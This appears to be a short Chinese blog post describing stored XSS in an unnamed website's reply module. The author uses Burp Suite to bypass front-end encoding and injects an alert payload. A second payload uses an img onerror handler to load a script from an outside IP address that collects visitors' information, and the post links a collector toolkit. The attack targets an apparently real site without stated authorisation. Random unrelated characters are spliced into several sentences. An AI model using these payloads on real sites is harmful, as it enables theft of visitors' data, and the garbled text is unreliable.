某站發(fā)帖與回帖模塊存在XSS焚鲜,但由于它開啟了httponly,XSS也就是測試下.
此例為回帖:
由于前端經(jīng)過了HTML實體編碼掌唾,內(nèi)容隨意填寫一些好識別的:
13.png
](http://upload-images.jianshu.io/upload_images/2414995-2bd7996f8b3716b6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
用Burp Suite 抓包修改內(nèi)容部分
寫入payload:<script>alert(1)</script>
12.png
修改后放行,關閉代理忿磅,頁面出現(xiàn)彈窗:
13.png
換一種玩法糯彬,加載js文件,獲取更多信息:
重新回帖葱她,Burp Suite 抓包修改內(nèi)容部分
寫入payload:<img src='x' onerror="s=createElement('script');body.appendChild(s);s.src='http://xxx.xxx.xxx.xxx/xsstest.js'">
14.png
修改后放行撩扒,關閉代理,在接收端可以看到獲取到的信息:
15.png
獲取信息的JS文件吨些,PHP文件和HTML文件搓谆,都是借鑒github上的,支持下載:
https://github.com/evilcos/xssprobe